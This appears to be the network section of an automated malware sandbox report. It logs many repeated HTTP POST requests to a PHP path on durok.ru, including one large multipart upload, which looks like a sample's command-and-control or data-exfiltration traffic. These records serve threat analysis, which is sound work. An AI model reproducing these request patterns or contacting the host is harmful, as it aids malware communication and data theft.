                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 384Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 1916Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2124Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----vFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5XgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 120494Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2116Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2092Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2116Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2544Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2092Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
